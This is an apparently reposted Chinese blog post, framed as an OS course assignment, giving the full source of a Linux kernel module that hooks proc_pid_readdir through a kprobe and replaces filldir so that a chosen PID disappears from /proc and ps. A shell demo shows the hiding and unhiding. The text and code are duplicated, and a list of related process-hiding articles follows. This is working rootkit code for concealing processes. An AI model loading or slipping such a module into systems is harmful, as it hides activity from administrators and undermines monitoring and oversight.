Linux内核通过inline hook实现隐藏进程
2012-12-17 10:49
609 查看
这是我们操作系统的大作业。
原理就是inline hook 那个 proc 文件系统,根目录下的 readdir 的函数。
替换掉第三个参数,filldir。
代码爆短,60来行。
Ubuntu 10.04 测试可用。
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
#include <linux/kernel.h>
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
#include <linux/kprobes.h>
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
#include <linux/module.h>
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
#include <linux/moduleparam.h>
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
#include <linux/fs.h>
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
int register_kprobe(struct kprobe *kp);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/2f88ce130b654eb5dc6788e02dbcfc90.gif)
static struct kprobe kp = {
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
.symbol_name = "proc_pid_readdir",
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/0ac3a2d53663ec01c7f7225264eeefae.gif)
};
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
static filldir_t old_filldir;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
static int pid;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
module_param(pid, int, 0744);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
static int filldir(void * __buf, const char * name, int namlen, loff_t offset,
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
u64 ino, unsigned int d_type)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/2f88ce130b654eb5dc6788e02dbcfc90.gif)
{
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
int p;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
sscanf(name, "%d", &p);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
if (p == pid)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
return 0;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
return old_filldir(__buf, name, namlen, offset, ino, d_type);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/0ac3a2d53663ec01c7f7225264eeefae.gif)
}
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/2f88ce130b654eb5dc6788e02dbcfc90.gif)
/* kprobe pre_handler: called just before the probed instruction is executed */
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
static int handler_pre(struct kprobe *pr, struct pt_regs *regs)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/2f88ce130b654eb5dc6788e02dbcfc90.gif)
{
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
old_filldir = (filldir_t)regs->cx;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
regs->cx = (typeof(regs->cx))filldir;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
return 0;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/0ac3a2d53663ec01c7f7225264eeefae.gif)
}
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
static int __init k_init(void)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/2f88ce130b654eb5dc6788e02dbcfc90.gif)
{
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
int ret;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
kp.pre_handler = handler_pre;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
ret = register_kprobe(&kp);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/f70a0fde2b51b7dd92a70e712e540cf6.gif)
if (ret < 0) {
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
printk(KERN_INFO "register_kprobe failed, returned %d\n", ret);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
return ret;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/4a5daaec04350a363f186a4d2c5ed6ce.gif)
}
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
printk(KERN_INFO "Planted kprobe at %p; pid %d\n", kp.addr, pid);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
return 0;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/0ac3a2d53663ec01c7f7225264eeefae.gif)
}
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
static void __exit k_exit(void)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/2f88ce130b654eb5dc6788e02dbcfc90.gif)
{
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
unregister_kprobe(&kp);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
printk(KERN_INFO "kprobe at %p unregistered\n", kp.addr);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/0ac3a2d53663ec01c7f7225264eeefae.gif)
}
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
module_init(k_init);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
module_exit(k_exit);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
MODULE_LICENSE("GPL");
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
sleep 1000 &
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
pid=`jobs -p`
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
echo 'before hide'
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
ps aux | grep $pid
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
insmod k.ko pid=$pid
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
echo 'after hide'
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
ps aux | grep $pid
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
rmmod k.ko
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
echo 'after unhide'
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
ps aux | grep $pid
原理就是inline hook 那个 proc 文件系统,根目录下的 readdir 的函数。
替换掉第三个参数,filldir。
代码爆短,60来行。
Ubuntu 10.04 测试可用。
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
#include <linux/kernel.h>
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
#include <linux/kprobes.h>
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
#include <linux/module.h>
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
#include <linux/moduleparam.h>
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
#include <linux/fs.h>
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
int register_kprobe(struct kprobe *kp);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/2f88ce130b654eb5dc6788e02dbcfc90.gif)
static struct kprobe kp = {
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
.symbol_name = "proc_pid_readdir",
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/0ac3a2d53663ec01c7f7225264eeefae.gif)
};
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
static filldir_t old_filldir;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
static int pid;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
module_param(pid, int, 0744);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
static int filldir(void * __buf, const char * name, int namlen, loff_t offset,
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
u64 ino, unsigned int d_type)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/2f88ce130b654eb5dc6788e02dbcfc90.gif)
{
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
int p;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
sscanf(name, "%d", &p);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
if (p == pid)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
return 0;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
return old_filldir(__buf, name, namlen, offset, ino, d_type);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/0ac3a2d53663ec01c7f7225264eeefae.gif)
}
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/2f88ce130b654eb5dc6788e02dbcfc90.gif)
/* kprobe pre_handler: called just before the probed instruction is executed */
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
static int handler_pre(struct kprobe *pr, struct pt_regs *regs)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/2f88ce130b654eb5dc6788e02dbcfc90.gif)
{
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
old_filldir = (filldir_t)regs->cx;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
regs->cx = (typeof(regs->cx))filldir;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
return 0;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/0ac3a2d53663ec01c7f7225264eeefae.gif)
}
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
static int __init k_init(void)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/2f88ce130b654eb5dc6788e02dbcfc90.gif)
{
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
int ret;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
kp.pre_handler = handler_pre;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
ret = register_kprobe(&kp);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/f70a0fde2b51b7dd92a70e712e540cf6.gif)
if (ret < 0) {
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
printk(KERN_INFO "register_kprobe failed, returned %d\n", ret);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
return ret;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/4a5daaec04350a363f186a4d2c5ed6ce.gif)
}
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
printk(KERN_INFO "Planted kprobe at %p; pid %d\n", kp.addr, pid);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
return 0;
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/0ac3a2d53663ec01c7f7225264eeefae.gif)
}
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
static void __exit k_exit(void)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/2f88ce130b654eb5dc6788e02dbcfc90.gif)
{
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
unregister_kprobe(&kp);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/df37983f39daa189b8c814e01a6a9011.gif)
printk(KERN_INFO "kprobe at %p unregistered\n", kp.addr);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/0ac3a2d53663ec01c7f7225264eeefae.gif)
}
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
module_init(k_init);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
module_exit(k_exit);
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
MODULE_LICENSE("GPL");
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
sleep 1000 &
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
pid=`jobs -p`
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
echo 'before hide'
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
ps aux | grep $pid
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
insmod k.ko pid=$pid
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
echo 'after hide'
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
ps aux | grep $pid
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
rmmod k.ko
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
echo 'after unhide'
![](https://oscdn.geek-share.com/Uploads/Images/Content/201705/cbef093dcc044b2793832001e2365e43.gif)
ps aux | grep $pid
相关文章推荐
- 进程隐藏与进程保护(SSDT Hook 实现)(一)
- 进程隐藏与进程保护(SSDT Hook 实现)(三) 转载自 Zachary.XiaoZhen - 梦想的天空
- 进程隐藏与进程保护(SSDT Hook 实现)(一)
- 进程隐藏与进程保护(SSDT Hook 实现)(三)
- 【原创】详谈内核三步走Inline Hook实现
- 详谈内核三步走Inline Hook实现
- 进程隐藏与进程保护(SSDT Hook 实现)(三)
- 进程隐藏与进程保护(SSDT Hook 实现)(二)
- 进程隐藏与进程保护(SSDT Hook 实现)(二)
- 进程隐藏与进程保护(SSDT Hook 实现)(二)
- Inline hook KeyboardClassServiceCallback实现键盘记录
- 进程隐藏与进程保护(SSDT Hook 实现)(三)
- 进程隐藏与进程保护(SSDT Hook 实现)(三)
- 进程隐藏与进程保护(SSDT Hook 实现)(一)
- 进程隐藏与进程保护(SSDT Hook 实现)(二)
- 进程隐藏与进程保护(SSDT Hook 实现)(二)
- 通过读取KiWaitInListHead列出隐藏的进程
- 进程隐藏与进程保护(SSDT HOOK 实现)
- 进程隐藏与进程保护(SSDT Hook 实现)(三)
- 进程隐藏与进程保护(SSDT Hook 实现)(三)